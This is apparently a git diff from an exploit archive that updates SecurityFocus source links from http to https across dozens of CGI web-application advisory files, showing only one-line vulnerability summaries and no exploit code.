a25c4d381..cc8bb7f1e 100644 --- a/exploits/cgi/webapps/30606.txt +++ b/exploits/cgi/webapps/30606.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25788/info +source: https://www.securityfocus.com/bid/25788/info Urchin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30639.txt b/exploits/cgi/webapps/30639.txt index 094498b29..40aa68901 100644 --- a/exploits/cgi/webapps/30639.txt +++ b/exploits/cgi/webapps/30639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25928/info +source: https://www.securityfocus.com/bid/25928/info Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30649.txt b/exploits/cgi/webapps/30649.txt index ee251d265..c569f4799 100644 --- a/exploits/cgi/webapps/30649.txt +++ b/exploits/cgi/webapps/30649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25981/info +source: https://www.securityfocus.com/bid/25981/info DNews is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30661.txt b/exploits/cgi/webapps/30661.txt index 8e075fc0f..2bb10df2e 100644 --- a/exploits/cgi/webapps/30661.txt +++ b/exploits/cgi/webapps/30661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26037/info +source: https://www.securityfocus.com/bid/26037/info Google Urchin is prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/30759.txt b/exploits/cgi/webapps/30759.txt index 9f8fd6a97..88b136344 100644 --- a/exploits/cgi/webapps/30759.txt +++ b/exploits/cgi/webapps/30759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26419/info +source: https://www.securityfocus.com/bid/26419/info Web Gateway is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/cgi/webapps/30770.txt b/exploits/cgi/webapps/30770.txt index beec7e91d..2a2515451 100644 --- a/exploits/cgi/webapps/30770.txt +++ b/exploits/cgi/webapps/30770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26464/info +source: https://www.securityfocus.com/bid/26464/info AIDA Web is prone to multiple unauthorized access vulnerabilities. diff --git a/exploits/cgi/webapps/30777.txt b/exploits/cgi/webapps/30777.txt index 30548e2c8..cd638ad73 100644 --- a/exploits/cgi/webapps/30777.txt +++ b/exploits/cgi/webapps/30777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26491/info +source: https://www.securityfocus.com/bid/26491/info Citrix NetScaler is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30795.txt b/exploits/cgi/webapps/30795.txt index bb3141c03..f5a14f827 100644 --- a/exploits/cgi/webapps/30795.txt +++ b/exploits/cgi/webapps/30795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26525/info +source: https://www.securityfocus.com/bid/26525/info GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30808.txt b/exploits/cgi/webapps/30808.txt index e5f3b7837..44308501c 100644 --- a/exploits/cgi/webapps/30808.txt +++ b/exploits/cgi/webapps/30808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26582/info +source: https://www.securityfocus.com/bid/26582/info GWExtranet is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/30818.txt b/exploits/cgi/webapps/30818.txt index 42fe55979..33c2dfe46 100644 --- a/exploits/cgi/webapps/30818.txt +++ b/exploits/cgi/webapps/30818.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26610/info +source: https://www.securityfocus.com/bid/26610/info ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/30919.txt b/exploits/cgi/webapps/30919.txt index 4f08c9084..9bf2faad9 100644 --- a/exploits/cgi/webapps/30919.txt +++ b/exploits/cgi/webapps/30919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26963/info +source: https://www.securityfocus.com/bid/26963/info SiteScape Forum is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30975.txt b/exploits/cgi/webapps/30975.txt index 4bccfef36..15345cbb7 100644 --- a/exploits/cgi/webapps/30975.txt +++ b/exploits/cgi/webapps/30975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27116/info +source: https://www.securityfocus.com/bid/27116/info W3-mSQL is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31025.txt b/exploits/cgi/webapps/31025.txt index d99b19046..b29a9e8f4 100644 --- a/exploits/cgi/webapps/31025.txt +++ b/exploits/cgi/webapps/31025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27273/info +source: https://www.securityfocus.com/bid/27273/info Garment Center is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31043.txt b/exploits/cgi/webapps/31043.txt index 731945182..b67787c23 100644 --- a/exploits/cgi/webapps/31043.txt +++ b/exploits/cgi/webapps/31043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27374/info +source: https://www.securityfocus.com/bid/27374/info Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability. 
diff --git a/exploits/cgi/webapps/31071.txt b/exploits/cgi/webapps/31071.txt index 54d540f2c..5b7628238 100644 --- a/exploits/cgi/webapps/31071.txt +++ b/exploits/cgi/webapps/31071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27475/info +source: https://www.securityfocus.com/bid/27475/info VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31081.txt b/exploits/cgi/webapps/31081.txt index 1755d3d57..4cfda62f1 100644 --- a/exploits/cgi/webapps/31081.txt +++ b/exploits/cgi/webapps/31081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27535/info +source: https://www.securityfocus.com/bid/27535/info OpenBSD bgplg is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31313.txt b/exploits/cgi/webapps/31313.txt index ce549511d..25e7c40b4 100644 --- a/exploits/cgi/webapps/31313.txt +++ b/exploits/cgi/webapps/31313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28037/info +source: https://www.securityfocus.com/bid/28037/info Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability. diff --git a/exploits/cgi/webapps/31411.txt b/exploits/cgi/webapps/31411.txt index d828a875e..c309833bf 100644 --- a/exploits/cgi/webapps/31411.txt +++ b/exploits/cgi/webapps/31411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28277/info +source: https://www.securityfocus.com/bid/28277/info RSA WebID is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31466.txt b/exploits/cgi/webapps/31466.txt index 43e583402..6bd1a0be6 100644 --- a/exploits/cgi/webapps/31466.txt +++ b/exploits/cgi/webapps/31466.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28393/info +source: https://www.securityfocus.com/bid/28393/info Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31537.txt b/exploits/cgi/webapps/31537.txt index 3bed6e724..7e1cf5214 100644 --- a/exploits/cgi/webapps/31537.txt +++ b/exploits/cgi/webapps/31537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28455/info +source: https://www.securityfocus.com/bid/28455/info Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31538.txt b/exploits/cgi/webapps/31538.txt index 669f43959..c7c6f521d 100644 --- a/exploits/cgi/webapps/31538.txt +++ b/exploits/cgi/webapps/31538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28455/info +source: https://www.securityfocus.com/bid/28455/info Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31754.txt b/exploits/cgi/webapps/31754.txt index 6d5e2388a..e55ae06fb 100644 --- a/exploits/cgi/webapps/31754.txt +++ b/exploits/cgi/webapps/31754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29103/info +source: https://www.securityfocus.com/bid/29103/info SAP Internet Transaction Server is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31755.txt b/exploits/cgi/webapps/31755.txt index f9b29c3f4..8b3cac2e4 100644 --- a/exploits/cgi/webapps/31755.txt +++ b/exploits/cgi/webapps/31755.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29103/info +source: https://www.securityfocus.com/bid/29103/info SAP Internet Transaction Server is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/31892.txt b/exploits/cgi/webapps/31892.txt index a1c906b3b..cbc2ea429 100644 --- a/exploits/cgi/webapps/31892.txt +++ b/exploits/cgi/webapps/31892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29626/info +source: https://www.securityfocus.com/bid/29626/info Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/32094.pl b/exploits/cgi/webapps/32094.pl index 18403d692..62a6a41ee 100755 --- a/exploits/cgi/webapps/32094.pl +++ b/exploits/cgi/webapps/32094.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30320/info +source: https://www.securityfocus.com/bid/30320/info HiFriend is prone to an open-email-relay vulnerability. diff --git a/exploits/cgi/webapps/32258.txt b/exploits/cgi/webapps/32258.txt index ca80c7e3e..8818d4e92 100644 --- a/exploits/cgi/webapps/32258.txt +++ b/exploits/cgi/webapps/32258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30730/info +source: https://www.securityfocus.com/bid/30730/info AWStats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/32430.txt b/exploits/cgi/webapps/32430.txt index 4111724fc..2b414e815 100644 --- a/exploits/cgi/webapps/32430.txt +++ b/exploits/cgi/webapps/32430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31436/info +source: https://www.securityfocus.com/bid/31436/info WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/cgi/webapps/32734.txt b/exploits/cgi/webapps/32734.txt index f88e4af80..652da0278 100644 --- a/exploits/cgi/webapps/32734.txt +++ b/exploits/cgi/webapps/32734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33312/info +source: https://www.securityfocus.com/bid/33312/info LemonLDAP:NG is prone to a user-enumeration weakness and a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/32746.txt b/exploits/cgi/webapps/32746.txt index b8a1a2b3e..c8103fc20 100644 --- a/exploits/cgi/webapps/32746.txt +++ b/exploits/cgi/webapps/32746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33365/info +source: https://www.securityfocus.com/bid/33365/info MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/32768.pl b/exploits/cgi/webapps/32768.pl index f3f382cf7..e17be8288 100755 --- a/exploits/cgi/webapps/32768.pl +++ b/exploits/cgi/webapps/32768.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33525/info +source: https://www.securityfocus.com/bid/33525/info PerlSoft Gästebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that an attacker must have administrative access to the script to exploit this issue. diff --git a/exploits/cgi/webapps/32870.txt b/exploits/cgi/webapps/32870.txt index eb1017e47..623f7449b 100644 --- a/exploits/cgi/webapps/32870.txt +++ b/exploits/cgi/webapps/32870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34159/info +source: https://www.securityfocus.com/bid/34159/info AWStats is prone to a path-disclosure vulnerability. diff --git a/exploits/cgi/webapps/32907.txt b/exploits/cgi/webapps/32907.txt index dd5b8214f..e1e62c566 100644 --- a/exploits/cgi/webapps/32907.txt +++ b/exploits/cgi/webapps/32907.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34507/info +source: https://www.securityfocus.com/bid/34507/info Banshee DAAP Extension is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/33231.txt b/exploits/cgi/webapps/33231.txt index 5a807a0ea..2d66bf79c 100644 --- a/exploits/cgi/webapps/33231.txt +++ b/exploits/cgi/webapps/33231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36450/info +source: https://www.securityfocus.com/bid/36450/info Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including: diff --git a/exploits/cgi/webapps/33958.txt b/exploits/cgi/webapps/33958.txt index a4cd8b303..409a8bafe 100644 --- a/exploits/cgi/webapps/33958.txt +++ b/exploits/cgi/webapps/33958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39988/info +source: https://www.securityfocus.com/bid/39988/info Publique! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cgi/webapps/34080.txt b/exploits/cgi/webapps/34080.txt index c36c58c23..f2035d2ec 100644 --- a/exploits/cgi/webapps/34080.txt +++ b/exploits/cgi/webapps/34080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40549/info +source: https://www.securityfocus.com/bid/40549/info MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/34223.txt b/exploits/cgi/webapps/34223.txt index 73e94acb4..80c69eb0e 100644 --- a/exploits/cgi/webapps/34223.txt +++ b/exploits/cgi/webapps/34223.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41228/info +source: https://www.securityfocus.com/bid/41228/info Miyabi CGI Tools is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/34347.txt b/exploits/cgi/webapps/34347.txt index e1d35d535..74cbaacce 100644 --- a/exploits/cgi/webapps/34347.txt +++ b/exploits/cgi/webapps/34347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41768/info +source: https://www.securityfocus.com/bid/41768/info iOffice is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/34794.txt b/exploits/cgi/webapps/34794.txt index 82e33dbe4..9af2df668 100644 --- a/exploits/cgi/webapps/34794.txt +++ b/exploits/cgi/webapps/34794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43636/info +source: https://www.securityfocus.com/bid/43636/info Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability. diff --git a/exploits/cgi/webapps/34994.txt b/exploits/cgi/webapps/34994.txt index 901dfc672..8d74387f4 100644 --- a/exploits/cgi/webapps/34994.txt +++ b/exploits/cgi/webapps/34994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44843/info +source: https://www.securityfocus.com/bid/44843/info OpenWrt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35008.txt b/exploits/cgi/webapps/35008.txt index 860e8cf51..6840880a1 100644 --- a/exploits/cgi/webapps/35008.txt +++ b/exploits/cgi/webapps/35008.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45000/info +source: https://www.securityfocus.com/bid/45000/info Hot Links SQL is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cgi/webapps/35015.txt b/exploits/cgi/webapps/35015.txt index 98039fb49..b32cc25d1 100644 --- a/exploits/cgi/webapps/35015.txt +++ b/exploits/cgi/webapps/35015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45040/info +source: https://www.securityfocus.com/bid/45040/info SimpLISTic SQL is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35035.txt b/exploits/cgi/webapps/35035.txt index 0606ad9c2..18471f7c6 100644 --- a/exploits/cgi/webapps/35035.txt +++ b/exploits/cgi/webapps/35035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45123/info +source: https://www.securityfocus.com/bid/45123/info Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows. diff --git a/exploits/cgi/webapps/35085.txt b/exploits/cgi/webapps/35085.txt index 21d8854af..d4b542acb 100644 --- a/exploits/cgi/webapps/35085.txt +++ b/exploits/cgi/webapps/35085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45303/info +source: https://www.securityfocus.com/bid/45303/info WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35093.txt b/exploits/cgi/webapps/35093.txt index ff4ae1ac1..0609d730b 100644 --- a/exploits/cgi/webapps/35093.txt +++ b/exploits/cgi/webapps/35093.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45342/info +source: https://www.securityfocus.com/bid/45342/info BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35438.txt b/exploits/cgi/webapps/35438.txt index b33c20fd7..82f650c59 100644 --- a/exploits/cgi/webapps/35438.txt +++ b/exploits/cgi/webapps/35438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46828/info +source: https://www.securityfocus.com/bid/46828/info CosmoShop is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/35676.txt b/exploits/cgi/webapps/35676.txt index e34679e3c..8c665c684 100644 --- a/exploits/cgi/webapps/35676.txt +++ b/exploits/cgi/webapps/35676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47628/info +source: https://www.securityfocus.com/bid/47628/info BackupPC is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/35698.txt b/exploits/cgi/webapps/35698.txt index 2974755c7..2be0b93f8 100644 --- a/exploits/cgi/webapps/35698.txt +++ b/exploits/cgi/webapps/35698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47687/info +source: https://www.securityfocus.com/bid/47687/info Proofpoint Protection Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/35802.txt b/exploits/cgi/webapps/35802.txt index 3de946be0..6eb07aeb9 100644 --- a/exploits/cgi/webapps/35802.txt +++ b/exploits/cgi/webapps/35802.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48009/info +source: https://www.securityfocus.com/bid/48009/info Blackboard Learn is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/36457.txt b/exploits/cgi/webapps/36457.txt index 8cb413e2a..9b955321f 100644 --- a/exploits/cgi/webapps/36457.txt +++ b/exploits/cgi/webapps/36457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51085/info +source: https://www.securityfocus.com/bid/51085/info Websense Triton is prone to a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/36458.txt b/exploits/cgi/webapps/36458.txt index 35259b0d7..1c3e4a6a0 100644 --- a/exploits/cgi/webapps/36458.txt +++ b/exploits/cgi/webapps/36458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51086/info +source: https://www.securityfocus.com/bid/51086/info Websense Triton is prone to a remote command-execution vulnerability. diff --git a/exploits/cgi/webapps/36459.txt b/exploits/cgi/webapps/36459.txt index ca2a6af6b..7ebc32352 100644 --- a/exploits/cgi/webapps/36459.txt +++ b/exploits/cgi/webapps/36459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51087/info +source: https://www.securityfocus.com/bid/51087/info Multiple Websense products are prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/36772.txt b/exploits/cgi/webapps/36772.txt index 3f15c380b..9449d65c2 100644 --- a/exploits/cgi/webapps/36772.txt +++ b/exploits/cgi/webapps/36772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51995/info +source: https://www.securityfocus.com/bid/51995/info EditWrxLite CMS is prone to a remote command-execution vulnerability. diff --git a/exploits/cgi/webapps/36974.txt b/exploits/cgi/webapps/36974.txt index 6a0caa6a6..1089657c7 100644 --- a/exploits/cgi/webapps/36974.txt +++ b/exploits/cgi/webapps/36974.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52627/info +source: https://www.securityfocus.com/bid/52627/info WebGlimpse is prone to a remote command-injection vulnerability. diff --git a/exploits/cgi/webapps/36976.txt b/exploits/cgi/webapps/36976.txt index 7bfc8f5d5..42c745f45 100644 --- a/exploits/cgi/webapps/36976.txt +++ b/exploits/cgi/webapps/36976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52646/info +source: https://www.securityfocus.com/bid/52646/info WebGlimpse is prone to a path-disclosure vulnerability. diff --git a/exploits/cgi/webapps/36994.txt b/exploits/cgi/webapps/36994.txt index caf33f977..e49bc2bea 100644 --- a/exploits/cgi/webapps/36994.txt +++ b/exploits/cgi/webapps/36994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52651/info +source: https://www.securityfocus.com/bid/52651/info WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/37084.txt b/exploits/cgi/webapps/37084.txt index 9d532ae65..13520b38d 100644 --- a/exploits/cgi/webapps/37084.txt +++ b/exploits/cgi/webapps/37084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53032/info +source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. diff --git a/exploits/cgi/webapps/37549.txt b/exploits/cgi/webapps/37549.txt index e9df6b126..0456d915b 100644 --- a/exploits/cgi/webapps/37549.txt +++ b/exploits/cgi/webapps/37549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54727/info +source: https://www.securityfocus.com/bid/54727/info Scrutinizer is prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/37638.txt b/exploits/cgi/webapps/37638.txt index d2f3f3b23..18e4875eb 100644 --- a/exploits/cgi/webapps/37638.txt +++ b/exploits/cgi/webapps/37638.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55082/info +source: https://www.securityfocus.com/bid/55082/info LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/37806.txt b/exploits/cgi/webapps/37806.txt index a8b80494a..ff6762509 100644 --- a/exploits/cgi/webapps/37806.txt +++ b/exploits/cgi/webapps/37806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55589/info +source: https://www.securityfocus.com/bid/55589/info AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/37830.txt b/exploits/cgi/webapps/37830.txt index 6418980d1..e7d6f0f65 100644 --- a/exploits/cgi/webapps/37830.txt +++ b/exploits/cgi/webapps/37830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55638/info +source: https://www.securityfocus.com/bid/55638/info ZEN Load Balancer is prone to the following security vulnerabilities: diff --git a/exploits/cgi/webapps/38114.html b/exploits/cgi/webapps/38114.html index b9217c1d8..b9bfea1f1 100644 --- a/exploits/cgi/webapps/38114.html +++ b/exploits/cgi/webapps/38114.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56881/info +source: https://www.securityfocus.com/bid/56881/info Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities. diff --git a/exploits/cgi/webapps/38550.txt b/exploits/cgi/webapps/38550.txt index 73958939f..3fcb26d05 100644 --- a/exploits/cgi/webapps/38550.txt +++ b/exploits/cgi/webapps/38550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60354/info +source: https://www.securityfocus.com/bid/60354/info QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability. 
diff --git a/exploits/cgi/webapps/38593.txt b/exploits/cgi/webapps/38593.txt index e499792c8..18a7e5353 100644 --- a/exploits/cgi/webapps/38593.txt +++ b/exploits/cgi/webapps/38593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60760/info +source: https://www.securityfocus.com/bid/60760/info FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/38691.txt b/exploits/cgi/webapps/38691.txt index 073912140..171d38afb 100644 --- a/exploits/cgi/webapps/38691.txt +++ b/exploits/cgi/webapps/38691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61728/info +source: https://www.securityfocus.com/bid/61728/info Kwok Information Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cgi/webapps/38806.txt b/exploits/cgi/webapps/38806.txt index e389ae38f..15341e2c4 100644 --- a/exploits/cgi/webapps/38806.txt +++ b/exploits/cgi/webapps/38806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63204/info +source: https://www.securityfocus.com/bid/63204/info Bugzilla is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/38807.txt b/exploits/cgi/webapps/38807.txt index a45d3a8e5..ea495daf2 100644 --- a/exploits/cgi/webapps/38807.txt +++ b/exploits/cgi/webapps/38807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63205/info +source: https://www.securityfocus.com/bid/63205/info Bugzilla is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/38882.txt b/exploits/cgi/webapps/38882.txt index 3c49f15cb..fed15e9bb 100644 --- a/exploits/cgi/webapps/38882.txt +++ b/exploits/cgi/webapps/38882.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64363/info +source: https://www.securityfocus.com/bid/64363/info Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition. diff --git a/exploits/cgi/webapps/39127.txt b/exploits/cgi/webapps/39127.txt index 158413180..54795b47b 100644 --- a/exploits/cgi/webapps/39127.txt +++ b/exploits/cgi/webapps/39127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66367/info +source: https://www.securityfocus.com/bid/66367/info innoEDIT is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39130.txt b/exploits/cgi/webapps/39130.txt index b83f6b87f..9ca93c95b 100644 --- a/exploits/cgi/webapps/39130.txt +++ b/exploits/cgi/webapps/39130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66487/info +source: https://www.securityfocus.com/bid/66487/info DotItYourself is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39131.txt b/exploits/cgi/webapps/39131.txt index c7e0a48a3..d5f8bc3c2 100644 --- a/exploits/cgi/webapps/39131.txt +++ b/exploits/cgi/webapps/39131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66489/info +source: https://www.securityfocus.com/bid/66489/info Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/39137.txt b/exploits/cgi/webapps/39137.txt index 673f3fdbb..83215bac4 100644 --- a/exploits/cgi/webapps/39137.txt +++ b/exploits/cgi/webapps/39137.txt 
